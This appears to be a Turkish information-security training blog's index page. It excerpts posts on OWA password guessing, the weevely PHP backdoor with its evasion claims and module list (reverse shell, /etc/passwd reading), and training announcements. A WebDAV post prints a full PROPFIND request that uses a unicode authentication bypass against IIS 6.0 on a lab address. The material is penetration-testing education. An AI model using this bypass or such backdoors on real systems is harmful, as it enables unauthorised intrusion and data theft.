Microsoft OWA(Outlook Web Access) kurumsal ortamlarda en fazla tercih edilen webmail uygulaması olarak karşımıza çıkmaktadır. Günümüz iş dünyasının en temel iletişim araçlarından birinin e-posta(mail olduğu düşünülürse dışarı açık OWA sistemlerinin büyük risk taşıdığı aşikardır.
Ele geçirilecek bir mail hesabı sadece sahibinin güvenliğini değil şirketin güvenliğini de tehlikeye atmaktadır. Basit mantıkla düşünülecek olursa ele geçirilmiş bir meil hesabı üzerinden hem sosyal mühendislik saldırıları hem de şirket çalışanlarının tüm özlük bilgileri sızdırılabilir.
Bu nedenle pentest çalışmalarında e-posta hesaplarının tahmin yöntemiyle ele geçirilmesi adımı önemli rol oynamaktadır. devamını oku…
İlgili diğer yazılar:
Pazartesi, 21 Kas 2011
bga
Uzak web sunuculara güvenlik açığından faydalanarak sızıldığında erişimin devam ettirilmesi için web tabanlı bir ajana ihtiyaç duyulur. Farklı dillerde (php, asp, java, .net, cgi vb.) yazılmış çeşitli yazılımlar mevcut. En popüler ve bilinen yazılımlar arasında, c99, r57, Aspxspy vb. scriptler bulunuyor. Hemen hemen hepsinin sorun yaşatan ortak yanı, Antivirus ve IPS ler tarafından tanınması ve çeşitli güvenlik ilkelerini (php disable_function gibi) bypass edememesi.
Daha önce buradaki yazımızda, meterpreter ile farklı web platformları için payload oluşturmakdan ve antivirusler tarafından tananınmamasını sağlamak üzere encoding tekniklerinden bahsetmiştik.
http://blog.bga.com.tr/beyaz-sapkali-hackerceh/asp-encode-ile-reverse-shell-msfencode
http://blog.bga.com.tr/beyaz-sapkali-hackerceh/php-reverse-shell-meterpreter
Bu yazıda, pratik olarak weevely php backdoor ile benzeri uygulamalar yer almaktadır.
weevely telnet benzeri bağlantı türünü destekleyen ve göze çarpmayan bir php backdoor ugulamasıdır. Web saldırılarında, erişimi sürdürmek ve sistemde ilerlemek için çeşitli post explotion tekniklerini içerir. Antivirusler tarafından tanınmamaktadır. Veri transferini HTTP Refferer değerleri üzerinden şifreli ilettiği için NIDS, IPS, WAF benzeri sistemler tanıyamamaktadır.
Desteklediği Moduller;
- :shell.sh Sistem komutlarını sh kabuğunda çalıştırır.
- :shell.php PHP komutlarını uzak sistemde çalıştırır.
- :file.upload Hedefin dosya sistemine dosya upload eder.
- :file.download Hedefin dosya sisteminden dosya download eder.
- :find.* Dosya adı, yetkiler, suid/sgid bayrakları bulur.
- :backdoor.reverse_tcp Reverse TCP shell açar.
- :enum.users Hedef sistemdeki kullanıcıları veya /etc/passwd içeriğini getirir.
- :enum.user_files home ve public_html dizinlerindeki dosyaları listeler
- :system.info Hedef Hedef sistem hakkında bilgi toplar devamını oku…
İlgili diğer yazılar:
Perşembe, 01 Eyl 2011
bga
Günümüz siber güvenlik dünyasının temelini oluşturan iki temel bileşenden biri uygulama güvenliğidir. Uygulamalar arka planda çalışan protokol ne kadar güvenli olursa olsun geliştiricisinin güvenlik hakkındaki bilgi ve tecrübesi kadar güvenli olacaktır. Uygulama geliştirme süreçlerinde alınmayan temel önlemler uygulama calışır duruma getirildiğinde ciddi güvenlik zafiyetlerine yol açmaktadır. Siber dünya basit bir uygulama hatasından tüm sistemin, ağın veya veritabanının ele geçirildiği örnekleriyle doludur.
BGA(Bilgi Güvenliği AKADEMİSİ) ve TUBİTAK BİLGEM işbirliğiyle düzenlenen “Uygulama Güvenliği Etkinliği” serisinin Ankara ayağında uygulama güvenliği konusu tüm yönleriyle ele alınarak katılımcılara konu hakkında bilgi aktarımı sağlanacaktır. devamını oku…
İlgili diğer yazılar:
Categories: Duyurular, Seminer/Konferans, Web Application Pentest Tags: application security, ethical hacking, kaynak kod denetimi, owasp, uygulama güvenliği, uygulama pentest, web application pentest, web application security, web uygulama güvenliği
Perşembe, 19 May 2011
bga
Eğitim tanımı: Günümüz bilişim güvenliğinin en zayıf halkalarından biri web uygulamalarının güvenliğidir. Eğitim, güvenlik birim çalışanlarına sorumluluklarında olan web uygulamalarının güvenlik testlerinin hangi adımlardan oluştuğunu ve nasıl yapıldığını pratik bir şekilde göstermeyi amaçlamaktadır. devamını oku…
İlgili diğer yazılar:
Cumartesi, 14 May 2011
bga
Kimlik Doğrulama Gerektiren Webdav Dizinleri
http://192.168.1.5/hesaplar dizini Windows Auth. gerektiren bir dizin. Bu dizine ve altındaki dosyalara erişim için yetkili bir kullanıcı hesabı ile kimlik doğrulama yapmak gerekmektedir.
WEBDAV Zayıflıkları
Unicode Bypass
CVE-2009-1676 güvenlik bülteni ile Microsoft IIS 6.0 web sunucusunun dosya paylaşımı için kullandığı “Webdav” servisinde uzakdan kimlik doğrulamayı bypass eden bir zaafiyet bulunduğu duyuruldu.
Kimlik doğrulama gerektiren, http://192.168.1.5/gizli adresine, unicode kod kullanarak bypass işlemi uygulayabiliriz.
/gizli dizinini listelemek için hazırlanan özel içerik, listele.txt ;
# cat listele.txt
PROPFIND /gi%c0%afzli/ HTTP/1.1
Connection: TE
TE: trailers
Host: 192.168.1.5
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version=”1.0″ encoding=”utf-8″?>
<propfind xmlns=”DAV:”><prop>
<getcontentlength xmlns=”DAV:”/>
<getcontentfied xmlns=”DAV:”/>
<executable xmlns=”http://apache.org/dav/props/”/>
<resourcetype xmlns=”DAV:”/>
<checked-in xmlns=”DAV:”/>
<checked-out xmlns=”DAV:”/>
</prop></propfind>
devamını oku…
İlgili diğer yazılar:
Perşembe, 12 May 2011
bga
WEBDAV Servisi Nedir / Nasıl Çalışır ?
WEBDAV (Web-based Distributed Authoring and Versioning ) servisi, web üzerinden dosya/dizin paylaşmayı sağlar. HTTP 1.1 protokolü ile çalışır. Kritik bir öneme sahiptir, sık çıkan güvenlik zaafiyetleri ve yanlış yapılandırma ile ciddi güvenlik riskleri oluşturmaktadır.Bu yazıda webdav servislerinin tespit edilmesi ve IIS 6.0 webdav zayıflığını sömürmekten bahsedilmiştir.
İlgili diğer yazılar:
Çarşamba, 23 Şub 2011
bga
HTML Form tabanlı kimlik doğrulama (form authentication) günümüzde sık tercih edilen kimlik doğrulama yöntemlerinden biridir. Internet üzerinden elde edilecek araçlarla ağ tabanlı servislere yönelik parola tahmin saldırıları kolaylıkla gerçekleştirilebilir fakat form tabanlı kimlik denetiminde parametreler standart olmadığı için diğer kimlik denetimi çeşitlerine oranla saldırı gerçekleştirmek daha zahmetli ve zordur.
devamını oku…
İlgili diğer yazılar:
Geçtiğimiz 6 ay içerisinde gerçekleştirdiğimiz eğitim tercih anketine katılan 400 kişinin oylama sonuçları ve kısa değerlendirmesi.
devamını oku…
İlgili diğer yazılar:
Çarşamba, 30 Haz 2010
bga
Günümüz bilişim güvenliğinin en zayıf halkalarından biri web uygulamalarının güvenliğidir. 24 Temmuz’da açılacak olan Web Uygulama Güvenlik Denetimi(Web Application Pentest)Eğitimi, güvenlik birim çalışanlarına sorumluluklarında olan web uygulamalarının güvenlik testlerinin hangi adımlardan oluştuğunu venasıl yapıldığını pratik bir şekilde gösterecektir. devamını oku…
İlgili diğer yazılar:
